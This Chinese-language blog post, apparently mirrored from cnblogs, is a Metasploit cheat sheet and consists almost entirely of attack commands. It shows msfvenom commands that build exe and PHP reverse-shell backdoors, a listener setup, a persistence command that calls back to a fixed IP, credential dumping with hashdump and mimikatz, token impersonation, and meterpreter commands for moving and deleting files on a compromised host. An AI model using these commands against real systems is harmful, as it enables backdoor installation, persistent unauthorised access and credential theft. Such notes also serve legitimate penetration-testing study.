zoukankan      html  css  js  c++  java
  • Metasploit笔记

    生成exe后门

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

    生成PHP后门

    msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

    使用监听模块(默认)

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    搜寻存在漏洞模块

    post/multi/recon/local_exploit_suggester

    迁移进程

    migrate pid

    权限维持 -Persistence

    run persistence -U -i 10 -p 4444 -r 192.168.61.3

    抓取Hash

    run hashdump

    load mimikatz

    令牌伪装

    list_tokens-u

    如果查看失败先用

    use incognito 或者 load incognito

    进入该模块 再使用

    impersonate_token 用户名

    基本操作命令

    ls:列出当前路径下的所有文件和文件夹。

    pwd 或 getwd:查看当前路径。

    search:搜索文件,使用 search -h 查看帮助。

    cat:查看文件内容,比如 cat test.txt

    edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

    rm:删除文件。

    cd:切换路径。

    mkdir:创建文件夹。

    rmdir:删除文件夹。

    getlwd 或 lpwd:查看自己系统的当前路径。

    lcd:切换自己当前系统的目录。

    lls:显示自己当前系统的所有文件和文件夹。

    upload: upload 本地文件路径目标文件路径.

    download: download 目标文件路径 本地文件路径

  • 相关阅读:
    Unity 之 中文乱码
    fork调用的底层实现
    Linux错误代码含义
    VMware 获取该虚拟机的所有权失败
    Qt ------ QAction
    C++ ------ const迭代器 和 const_iterator的区别
    IAR ------- 在线调试技巧
    STM32 ------ HardFault_Hander 中断函数
    从一张表中复制数据到另一张表中
    分布式任务调度平台xxl-job
  • 原文地址:https://www.cnblogs.com/M0rta1s/p/11707871.html
Copyright © 2011-2022 走看看